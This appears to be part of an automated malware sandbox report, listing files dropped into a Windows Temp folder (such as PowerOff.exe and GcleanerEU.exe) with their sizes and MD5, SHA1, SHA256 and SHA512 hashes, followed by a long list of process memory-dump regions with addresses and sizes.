5f96df0fb078c706569a49150cf1674f2d6e94cefec73b39a19275ea9a3ac7c6

SHA512
493c08bebef58d516461c9fc9249ab7d27a129c4e8bece05c45cbfb0e757c0a132173b41f7ed3dd0a7d0576acfc7113f4c389f894607d1f6498742ec6f3a5369

Download Submit
C:\Users\Admin\AppData\Local\Temp\ee-56cf6-278-af0bb-b882f9b79b530\Roqeceshije.exe
Filesize
586KB

MD5
436e921da691211e16a1adb9ff4d90cd

SHA1
6f64647c26bc9d98367618f185fbcfc7717d2851

SHA256
5f96df0fb078c706569a49150cf1674f2d6e94cefec73b39a19275ea9a3ac7c6

SHA512
493c08bebef58d516461c9fc9249ab7d27a129c4e8bece05c45cbfb0e757c0a132173b41f7ed3dd0a7d0576acfc7113f4c389f894607d1f6498742ec6f3a5369

Download Submit
C:\Users\Admin\AppData\Local\Temp\ee-56cf6-278-af0bb-b882f9b79b530\Roqeceshije.exe.config
Filesize
1KB

MD5
98d2687aec923f98c37f7cda8de0eb19

SHA1
f6dcfcdcfe570340ecdbbd9e2a61f3cb4f281ba7

SHA256
8a94163256a722ef8cc140bcd115a5b8f8725c04fe158b129d47be81cb693465

SHA512
95c7290d59749df8df495e04789c1793265e0f34e0d091df5c0d4aefe1af4c8ac1f5460f1f198fc28c4c8c900827b8f22e2851957bbaea5914ea962b3a1d0590

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-AD0BB.tmp\6368daabedc01_cd9ff84ca.tmp
Filesize
694KB

MD5
ffcf263a020aa7794015af0edee5df0b

SHA1
bce1eb5f0efb2c83f416b1782ea07c776666fdab

SHA256
1d07cfb7104b85fc0dffd761f6848ad176117e146bbb4079fe993efa06b94c64

SHA512
49f2b062adfb99c0c7f1012c56f0b52a8850d9f030cc32073b90025b372e4eb373f06a351e9b33264967427b8174c060c8a6110979f0eaf0872f7da6d5e4308a

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-O9Q70.tmp\PowerOff.exe
Filesize
577KB

MD5
1cd03d64a1906b7d3ad94ed8a0663a70

SHA1
779cc022efb6281ccaa1ba06e61f1065474b197c

SHA256
f62212a8f2f0a0d0eb072f7b14b012910c32558ffc29cfc95b089eacce74bf5c

SHA512
c605669c9f410e1735dec4c39ef2b958cd933c19fd191aa715a3ad5c4054cb540eae86803db60c986b45dcce9b79dea50f388ac23dd8e76b0fbbb498d5c7f081

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-O9Q70.tmp\PowerOff.exe
Filesize
577KB

MD5
1cd03d64a1906b7d3ad94ed8a0663a70

SHA1
779cc022efb6281ccaa1ba06e61f1065474b197c

SHA256
f62212a8f2f0a0d0eb072f7b14b012910c32558ffc29cfc95b089eacce74bf5c

SHA512
c605669c9f410e1735dec4c39ef2b958cd933c19fd191aa715a3ad5c4054cb540eae86803db60c986b45dcce9b79dea50f388ac23dd8e76b0fbbb498d5c7f081

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-O9Q70.tmp\idp.dll
Filesize
216KB

MD5
8f995688085bced38ba7795f60a5e1d3

SHA1
5b1ad67a149c05c50d6e388527af5c8a0af4343a

SHA256
203d7b61eac96de865ab3b586160e72c78d93ab5532b13d50ef27174126fd006

SHA512
043d41947ab69fc9297dcb5ad238acc2c35250d1172869945ed1a56894c10f93855f0210cbca41ceee9efb55fd56a35a4ec03c77e252409edc64bfb5fb821c35

Download Submit
C:\Users\Admin\AppData\Local\Temp\nc3ogk0g.iuf\GcleanerEU.exe
Filesize
301KB

MD5
9374ece71bdc4cfdc50b21f4dbe5bca0

SHA1
ee89e0c31c9773e995cb470a3861b720f6e16aa7

SHA256
7ef575d19790091c045e6b63315a311f41f1f8bf838f6bf915f4abb82e53383e

SHA512
e04ad76ddfbe86befbfe102f36c7ab09f1df5cf76630f7ac362b6d56618f7f55bd31bc2fa5f695b2de91e5029ea0246c54248401cc8e5144b8f14538cef4babf

Download Submit
C:\Users\Admin\AppData\Local\Temp\nc3ogk0g.iuf\GcleanerEU.exe
Filesize
301KB

MD5
9374ece71bdc4cfdc50b21f4dbe5bca0

SHA1
ee89e0c31c9773e995cb470a3861b720f6e16aa7

SHA256
7ef575d19790091c045e6b63315a311f41f1f8bf838f6bf915f4abb82e53383e

SHA512
e04ad76ddfbe86befbfe102f36c7ab09f1df5cf76630f7ac362b6d56618f7f55bd31bc2fa5f695b2de91e5029ea0246c54248401cc8e5144b8f14538cef4babf

Download Submit
C:\Users\Admin\AppData\Local\Temp\nv1ypbrb.1zd\random.exe
Filesize
923KB

MD5
964da73180a995495797e2107c4b936a

SHA1
d941ec8cb8d06c07f77d1c5318abeda5f23ab730

SHA256
1ae013d4e99c5bc1b818e14963f275caada1f71fa0186834dc7680124aea8b8d

SHA512
6252c809c8aefa1ef8c6742a3099970c6af178a878eba3dd9ef557df62ce6903b9ccf00be534d2b9c1f9b8ffdb4cceed8cc6e5b257b2abe7efcd0a155fe7efa7

Download Submit
\??\c:\users\admin\appdata\local\temp\is-ad0bb.tmp\6368daabedc01_cd9ff84ca.tmp
Filesize
694KB

MD5
ffcf263a020aa7794015af0edee5df0b

SHA1
bce1eb5f0efb2c83f416b1782ea07c776666fdab

SHA256
1d07cfb7104b85fc0dffd761f6848ad176117e146bbb4079fe993efa06b94c64

SHA512
49f2b062adfb99c0c7f1012c56f0b52a8850d9f030cc32073b90025b372e4eb373f06a351e9b33264967427b8174c060c8a6110979f0eaf0872f7da6d5e4308a

Download Submit
memory/696-301-0x0000021801C10000-0x0000021801D40000-memory.dmp

Filesize
1.2MB

Download
memory/696-257-0x0000021801C10000-0x0000021801D40000-memory.dmp

Filesize
1.2MB

Download
memory/696-256-0x0000021801E00000-0x0000021801F2A000-memory.dmp

Filesize
1.2MB

Download
memory/696-149-0x0000000000000000-mapping.dmp

Download
memory/960-205-0x0000000000000000-mapping.dmp

Download
memory/1288-157-0x0000000000000000-mapping.dmp

Download
memory/1320-204-0x0000000000000000-mapping.dmp

Download
memory/1360-200-0x0000000064940000-0x0000000064959000-memory.dmp

Filesize
100KB

Download
memory/1360-166-0x0000000064940000-0x0000000064959000-memory.dmp

Filesize
100KB

Download
memory/1360-132-0x0000000000000000-mapping.dmp

Download
memory/1364-298-0x00007FFE1C150000-0x00007FFE1CC11000-memory.dmp

Filesize
10.8MB

Download
memory/1364-248-0x00007FFE1C150000-0x00007FFE1CC11000-memory.dmp

Filesize
10.8MB

Download
memory/1364-241-0x0000000000000000-mapping.dmp

Download
memory/1384-173-0x0000000000000000-mapping.dmp

Download
memory/1384-203-0x0000000000400000-0x0000000000414000-memory.dmp

Filesize
80KB

Download
memory/1384-180-0x0000000000400000-0x0000000000414000-memory.dmp

Filesize
80KB

Download
memory/1384-281-0x0000000000400000-0x0000000000414000-memory.dmp

Filesize
80KB

Download
memory/1600-179-0x0000000000000000-mapping.dmp

Download
memory/1996-192-0x0000000000000000-mapping.dmp

Download
memory/2044-153-0x0000000000000000-mapping.dmp

Download
memory/2184-168-0x0000000000000000-mapping.dmp

Download
memory/2312-322-0x00000000035D0000-0x000000000368B000-memory.dmp

Filesize
748KB

Download
memory/2312-240-0x0000000000000000-mapping.dmp

Download
memory/2312-317-0x0000000003500000-0x00000000035CC000-memory.dmp

Filesize
816KB

Download
memory/2312-252-0x0000000003110000-0x000000000325C000-memory.dmp

Filesize
1.3MB

Download
memory/2312-253-0x00000000033B0000-0x00000000034F8000-memory.dmp

Filesize
1.3MB

Download
memory/2312-360-0x00000000033B0000-0x00000000034F8000-memory.dmp

Filesize
1.3MB

Download
memory/2372-150-0x0000000000000000-mapping.dmp

Download
memory/2584-336-0x0000000140000000-0x0000000140615000-memory.dmp

Filesize
6.1MB

Download
memory/2864-161-0x0000000000000000-mapping.dmp

Download
memory/2952-302-0x0000000003610000-0x00000000036CB000-memory.dmp

Filesize
748KB

Download
memory/2952-255-0x00000000033F0000-0x0000000003538000-memory.dmp

Filesize
1.3MB

Download
memory/2952-254-0x0000000003150000-0x000000000329C000-memory.dmp

Filesize
1.3MB

Download
memory/2952-239-0x0000000000000000-mapping.dmp

Download
memory/2952-294-0x0000000003540000-0x000000000360C000-memory.dmp

Filesize
816KB

Download
memory/2952-300-0x00000000033F0000-0x0000000003538000-memory.dmp

Filesize
1.3MB

Download
memory/3136-164-0x0000000000000000-mapping.dmp

Download
memory/3452-183-0x0000000000000000-mapping.dmp

Download
memory/3480-197-0x000000000077D000-0x000000000078D000-memory.dmp

Filesize
64KB

Download
memory/3480-158-0x0000000000000000-mapping.dmp

Download
memory/3480-198-0x00000000006E0000-0x00000000006E9000-memory.dmp

Filesize
36KB

Download
memory/3576-138-0x0000000000000000-mapping.dmp

Download
memory/3596-182-0x0000000000000000-mapping.dmp

Download
memory/3600-190-0x0000000000400000-0x0000000000409000-memory.dmp

Filesize
36KB

Download
memory/3600-250-0x0000000000400000-0x0000000000409000-memory.dmp

Filesize
36KB

Download
memory/3600-201-0x0000000000400000-0x0000000000409000-memory.dmp

Filesize
36KB

Download
memory/3600-185-0x0000000000000000-mapping.dmp

Download
memory/3860-193-0x00000000007C0000-0x00000000007ED000-memory.dmp

Filesize
180KB

Download
memory/3860-196-0x00000000007F0000-0x00000000007F8000-memory.dmp

Filesize
32KB

Download
memory/3860-188-0x0000000000650000-0x000000000067A000-memory.dmp

Filesize
168KB

Download
memory/3860-174-0x0000000000000000-mapping.dmp

Download
memory/4240-191-0x0000000000000000-mapping.dmp

Download
memory/4280-147-0x0000000000000000-mapping.dmp

Download
memory/4340-199-0x0000000000000000-mapping.dmp

Download
memory/4360-175-0x0000000000000000-mapping.dmp

Download
memory/4436-211-0x0000000000000000-mapping.dmp

Download
memory/4472-148-0x0000000000000000-mapping.dmp

Download
memory/4736-167-0x0000000000000000-mapping.dmp

Download
memory/4736-230-0x00000000021F0000-0x0000000002230000-memory.dmp

Filesize
256KB

Download
memory/4736-234-0x0000000000400000-0x000000000059E000-memory.dmp

Filesize
1.6MB

Download
memory/4736-228-0x0000000000600000-0x0000000000700000-memory.dmp

Filesize
1024KB

Download
memory/4736-348-0x0000000000400000-0x000000000059E000-memory.dmp

Filesize
1.6MB

Download
memory/4736-291-0x0000000000400000-0x000000000059E000-memory.dmp

Filesize
1.6MB

Download
memory/4736-289-0x0000000000600000-0x0000000000700000-memory.dmp

Filesize
1024KB

Download
memory/4740-206-0x0000000000000000-mapping.dmp

Download
memory/4792-236-0x0000000005FA0000-0x0000000005FBE000-memory.dmp

Filesize
120KB

Download
memory/4792-266-0x0000000007960000-0x0000000007FDA000-memory.dmp

Filesize
6.5MB

Download
memory/4792-268-0x0000000007000000-0x000000000701A000-memory.dmp

Filesize
104KB

Download
memory/4792-292-0x00000000075F0000-0x000000000760A000-memory.dmp

Filesize
104KB

Download
memory/4792-218-0x00000000058C0000-0x0000000005926000-memory.dmp

Filesize
408KB

Download
memory/4792-219-0x00000000059A0000-0x0000000005A06000-memory.dmp

Filesize
408KB

Download
memory/4792-260-0x00000000064D0000-0x00000000064EE000-memory.dmp

Filesize
120KB

Download
memory/4792-279-0x0000000007340000-0x000000000734A000-memory.dmp

Filesize
40KB

Download
memory/4792-259-0x00000000723B0000-0x00000000723FC000-memory.dmp

Filesize
304KB

Download
memory/4792-258-0x0000000006F70000-0x0000000006FA2000-memory.dmp

Filesize
200KB

Download
memory/4792-145-0x0000000000000000-mapping.dmp

Download
memory/4792-287-0x0000000007500000-0x000000000750E000-memory.dmp

Filesize
56KB

Download
memory/4792-172-0x0000000004A30000-0x0000000004A66000-memory.dmp

Filesize
216KB

Download
memory/4792-282-0x0000000007530000-0x00000000075C6000-memory.dmp

Filesize
600KB

Download
memory/4792-187-0x00000000050A0000-0x00000000056C8000-memory.dmp

Filesize
6.2MB

Download
memory/4792-212-0x0000000005060000-0x0000000005082000-memory.dmp

Filesize
136KB

Download
memory/4792-295-0x00000000075E0000-0x00000000075E8000-memory.dmp

Filesize
32KB

Download
memory/4808-144-0x0000000000000000-mapping.dmp

Download
memory/4864-142-0x0000000000000000-mapping.dmp

Download
memory/4924-140-0x0000000000000000-mapping.dmp

Download
memory/4944-163-0x0000000000000000-mapping.dmp

Download
memory/5004-137-0x0000000000000000-mapping.dmp

Download
memory/8348-214-0x0000000000000000-mapping.dmp

Download
memory/8360-215-0x0000000000000000-mapping.dmp

Download
memory/9364-242-0x0000000000000000-mapping.dmp

Download
memory/9364-296-0x00007FFE1C150000-0x00007FFE1CC11000-memory.dmp

Filesize
10.8MB

Download
memory/9364-249-0x00007FFE1C150000-0x00007FFE1CC11000-memory.dmp

Filesize
10.8MB

Download
memory/11384-220-0x0000000000000000-mapping.dmp

Download
memory/13116-221-0x0000000000000000-mapping.dmp

Download
memory/15056-245-0x0000000000000000-mapping.dmp

Download
memory/15136-278-0x00007FFE1C150000-0x00007FFE1CC11000-memory.dmp

Filesize
10.8MB

Download
memory/15136-237-0x00007FFE1C150000-0x00007FFE1CC11000-memory.dmp

Filesize
10.8MB

Download
memory/15136-232-0x00000000009B0000-0x0000000000A44000-memory.dmp

Filesize
592KB

Download
memory/15136-224-0x0000000000000000-mapping.dmp

Download
memory/15252-231-0x0000000000000000-mapping.dmp

Download
memory/15260-233-0x0000000000000000-mapping.dmp

Download
memory/15308-235-0x0000000000000000-mapping.dmp

Download
memory/15308-246-0x00007FFE1C150000-0x00007FFE1CC11000-memory.dmp

Filesize
10.8MB

Download
memory/15308-247-0x000001E357060000-0x000001E357082000-memory.dmp

Filesize
136KB

Download
memory/15308-297-0x00007FFE1C150000-0x00007FFE1CC11000-memory.dmp

Filesize
10.8MB

Download
memory/18448-251-0x0000000000000000-mapping.dmp

Download
memory/29340-261-0x0000000000000000-mapping.dmp

Download
memory/29400-263-0x0000000000000000-mapping.dmp

Download
memory/38016-265-0x0000000000000000-mapping.dmp

Download
memory/48712-269-0x0000000000000000-mapping.dmp

Download
memory/48712-283-0x00007FFE0E530000-0x00007FFE0EF66000-memory.dmp

Filesize
10.2MB

Download
memory/48732-284-0x00007FFE0E530000-0x00007FFE0EF66000-memory.dmp

Filesize
10.2MB

Download
memory/48732-270-0x0000000000000000-mapping.dmp

Download
memory/49436-277-0x0000000000000000-mapping.dmp

Download
memory/65172-285-0x0000000000000000-mapping.dmp

Download
memory/69220-286-0x0000000000000000-mapping.dmp

Download
memory/69452-290-0x0000000000000000-mapping.dmp

Download
memory/79484-293-0x0000000000000000-mapping.dmp

Download
memory/81308-305-0x0000000000000000-mapping.dmp

Download
memory/85596-299-0x0000000000000000-mapping.dmp

Download
memory/87424-316-0x0000000000400000-0x000000000045C000-memory.dmp

Filesize
368KB

Download
memory/87424-306-0x0000000000000000-mapping.dmp

Download
memory/87424-307-0x0000000000400000-0x000000000045C000-memory.dmp

Filesize
368KB

Download
memory/87476-310-0x0000000000000000-mapping.dmp

Download
memory/87532-313-0x0000000000000000-mapping.dmp

Download
memory/87568-320-0x00000000026B0000-0x000000000285D000-memory.dmp

Filesize
1.7MB

Download
memory/87568-349-0x0000000002F30000-0x0000000002FFC000-memory.dmp

Filesize
816KB

Download
memory/87568-351-0x0000000003000000-0x00000000030BB000-memory.dmp

Filesize
748KB

Download
memory/87568-350-0x0000000002DE0000-0x0000000002F28000-memory.dmp

Filesize
1.3MB

Download
memory/87568-327-0x0000000002B40000-0x0000000002C8C000-memory.dmp

Filesize
1.3MB

Download
memory/87568-328-0x0000000002DE0000-0x0000000002F28000-memory.dmp

Filesize
1.3MB

Download
memory/87568-315-0x0000000000000000-mapping.dmp

Download
memory/87720-321-0x0000000000000000-mapping.dmp

Download
memory/87860-362-0x0000000000400000-0x000000000084E000-memory.dmp

Filesize
4.3MB

Download
memory/87860-334-0x0000000000400000-0x000000000084E000-memory.dmp

Filesize
4.3MB

Download
memory/87860-333-0x0000000000C17000-0x0000000000C3E000-memory.dmp

Filesize
156KB

Download
memory/87860-361-0x0000000000C17000-0x0000000000C3E000-memory.dmp

Filesize
156KB

Download
memory/87948-344-0x0000000000A77000-0x0000000000A9E000-memory.dmp

Filesize
156KB

Download
memory/87948-346-0x0000000000400000-0x000000000084E000-memory.dmp

Filesize
4.3MB

Download
memory/87980-340-0x0000000002CF0000-0x0000000002E3C000-memory.dmp

Filesize
1.3MB

Download
memory/87980-359-0x0000000002F90000-0x00000000030D8000-memory.dmp

Filesize
1.3MB

Download
memory/87980-356-0x00000000031B0000-0x000000000326B000-memory.dmp

Filesize
748KB

Download
memory/87980-355-0x00000000030E0000-0x00000000031AC000-memory.dmp

Filesize
816KB

Download
memory/87980-342-0x0000000002F90000-0x00000000030D8000-memory.dmp

Filesize
1.3MB

Download